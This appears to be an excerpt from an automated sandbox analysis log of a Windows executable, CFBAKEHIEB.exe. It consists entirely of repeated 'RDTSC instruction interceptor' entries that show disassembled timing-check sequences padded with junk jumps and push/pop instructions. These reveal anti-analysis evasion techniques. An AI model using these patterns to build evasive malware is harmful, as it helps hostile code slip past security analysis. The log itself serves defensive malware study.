Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385CC second address: 6385D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6385D2 second address: 6385D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638701 second address: 638714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBDh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 638714 second address: 638718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63C77C second address: 63C7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDCAh 0x0000000a jmp 00007F12E108FDBEh 0x0000000f je 00007F12E108FDB6h 0x00000015 pushad 0x00000016 jmp 00007F12E108FDC0h 0x0000001b ja 00007F12E108FDB6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63C32C second address: 63C331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 63C331 second address: 63C337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 64AD30 second address: 64AD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 64AD36 second address: 64AD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 64AD3A second address: 64AD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F12E0FAFC7Dh 0x0000000e js 00007F12E0FAFC76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 pop edi 0x00000018 jnp 00007F12E0FAFC8Ah 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F12E0FAFC76h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6505EC second address: 6505F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6505F1 second address: 650611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC84h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jl 00007F12E0FAFC76h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6497EE second address: 6497FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F12E108FDB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 65D9C7 second address: 65D9DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F12E0FAFC80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 65D9DD second address: 65D9F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 6768DC second address: 676903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F12E0FAFC7Dh 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 jc 00007F12E0FAFC90h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F12E0FAFC76h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676A6B second address: 676A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676B96 second address: 676B9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676B9B second address: 676BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E108FDC4h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676BB6 second address: 676BC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F12E0FAFC8Eh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676BC7 second address: 676BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 676BD0 second address: 676BD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 677022 second address: 677035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F12E108FDB6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 678D85 second address: 678D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 678D89 second address: 678D9D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12E108FDB6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F12E108FDB6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 67B968 second address: 67B96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 67F025 second address: 67F029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 67F029 second address: 67F033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB029C second address: 4BB02F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F12E108FDC6h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F12E108FDC1h 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d call 00007F12E108FDC6h 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB02F3 second address: 4BB0363 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 32BBAE16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F12E0FAFC87h 0x0000000e pushfd 0x0000000f jmp 00007F12E0FAFC88h 0x00000014 add al, 00000068h 0x00000017 jmp 00007F12E0FAFC7Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007F12E0FAFC7Fh 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F12E0FAFC80h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0363 second address: 4BB0369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0369 second address: 4BB037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC7Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0029 second address: 4BA00D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F12E108FDC9h 0x00000008 add ch, 00000056h 0x0000000b jmp 00007F12E108FDC1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F12E108FDC0h 0x00000019 adc si, 4078h 0x0000001e jmp 00007F12E108FDBBh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F12E108FDC6h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f call 00007F12E108FDBCh 0x00000034 pop esi 0x00000035 pushfd 0x00000036 jmp 00007F12E108FDBBh 0x0000003b and eax, 0052E59Eh 0x00000041 jmp 00007F12E108FDC9h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA00D4 second address: 4BA00F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA00F0 second address: 4BA00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA00F4 second address: 4BA0107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0107 second address: 4BA0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDBFh 0x00000009 add si, 9D0Eh 0x0000000e jmp 00007F12E108FDC9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F12E108FDC0h 0x0000001a and ecx, 2B03D388h 0x00000020 jmp 00007F12E108FDBBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F12E108FDC0h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0175 second address: 4BA017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70108 second address: 4B7010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7010E second address: 4B7016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, 2Eh 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F12E0FAFC7Fh 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F12E0FAFC82h 0x00000020 or eax, 6E0BA778h 0x00000026 jmp 00007F12E0FAFC7Bh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7016A second address: 4B70182 instructions: 0x00000000 rdtsc 0x00000002 mov ch, DEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12E108FDBDh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70182 second address: 4B701AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov ax, 608Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+04h] 0x00000010 jmp 00007F12E0FAFC82h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b movsx edi, si 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B70220 second address: 4B7023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E108FDC8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B7023C second address: 4B70240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90E5D second address: 4B90E73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 mov ax, di 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B9085A second address: 4B90860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90860 second address: 4B908BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 pushfd 0x00000011 jmp 00007F12E108FDBAh 0x00000016 add ecx, 40EC44F8h 0x0000001c jmp 00007F12E108FDBBh 0x00000021 popfd 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F12E108FDC6h 0x0000002a mov ebp, esp 0x0000002c jmp 00007F12E108FDC0h 0x00000031 pop ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 mov bx, ax 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA0448 second address: 4BA045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BA045D second address: 4BA0505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ch, EDh 0x0000000f mov eax, edi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F12E108FDC6h 0x0000001a adc ecx, 612817C8h 0x00000020 jmp 00007F12E108FDBBh 0x00000025 popfd 0x00000026 pushad 0x00000027 push esi 0x00000028 pop ebx 0x00000029 call 00007F12E108FDC2h 0x0000002e pop esi 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov di, 2572h 0x00000037 jmp 00007F12E108FDC3h 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f pushad 0x00000040 call 00007F12E108FDC4h 0x00000045 call 00007F12E108FDC2h 0x0000004a pop esi 0x0000004b pop edi 0x0000004c mov eax, 67F6B1E7h 0x00000051 popad 0x00000052 pop ebp 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 mov si, 7DF5h 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BE005C second address: 4BE00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC81h 0x00000009 or ecx, 72D1C446h 0x0000000f jmp 00007F12E0FAFC81h 0x00000014 popfd 0x00000015 mov ax, 8EF7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f mov si, AB85h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F12E0FAFC87h 0x0000002c sub cl, 0000002Eh 0x0000002f jmp 00007F12E0FAFC89h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB073A second address: 4BB0791 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDC1h 0x00000009 xor si, 05E6h 0x0000000e jmp 00007F12E108FDC1h 0x00000013 popfd 0x00000014 mov edi, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F12E108FDBAh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F12E108FDC7h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0791 second address: 4BB07E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E0FAFC7Fh 0x00000009 xor ah, 0000007Eh 0x0000000c jmp 00007F12E0FAFC89h 0x00000011 popfd 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F12E0FAFC86h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B90783 second address: 4B907A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B907A0 second address: 4B907A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4B907A6 second address: 4B9080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F12E108FDC9h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F12E108FDBCh 0x00000019 sbb cl, 00000078h 0x0000001c jmp 00007F12E108FDBBh 0x00000021 popfd 0x00000022 mov edx, eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F12E108FDC1h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0197 second address: 4BB019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB019B second address: 4BB01A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01A1 second address: 4BB01A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01A7 second address: 4BB01C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01C0 second address: 4BB01C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01C4 second address: 4BB01CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01CA second address: 4BB01D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01D0 second address: 4BB01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01D4 second address: 4BB01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB01D8 second address: 4BB020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F12E108FDC6h 0x00000012 or si, D668h 0x00000017 jmp 00007F12E108FDBBh 0x0000001c popfd 0x0000001d push eax 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB020F second address: 4BB0215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0215 second address: 4BB0219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0219 second address: 4BB0228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, bh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB04AC second address: 4BB0579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12E108FDC1h 0x00000009 xor ax, EFE6h 0x0000000e jmp 00007F12E108FDC1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F12E108FDC0h 0x0000001a xor cl, FFFFFF88h 0x0000001d jmp 00007F12E108FDBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F12E108FDC4h 0x0000002e add si, E5E8h 0x00000033 jmp 00007F12E108FDBBh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F12E108FDC8h 0x0000003f or esi, 4E717848h 0x00000045 jmp 00007F12E108FDBBh 0x0000004a popfd 0x0000004b popad 0x0000004c push eax 0x0000004d jmp 00007F12E108FDC9h 0x00000052 xchg eax, ebp 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F12E108FDBDh 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 4BB0579 second address: 4BB05FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov eax, 2922EED9h 0x00000012 pushfd 0x00000013 jmp 00007F12E0FAFC86h 0x00000018 jmp 00007F12E0FAFC85h 0x0000001d popfd 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F12E0FAFC80h 0x00000025 adc cl, FFFFFFC8h 0x00000028 jmp 00007F12E0FAFC7Bh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F12E0FAFC85h 0x00000037 rdtsc
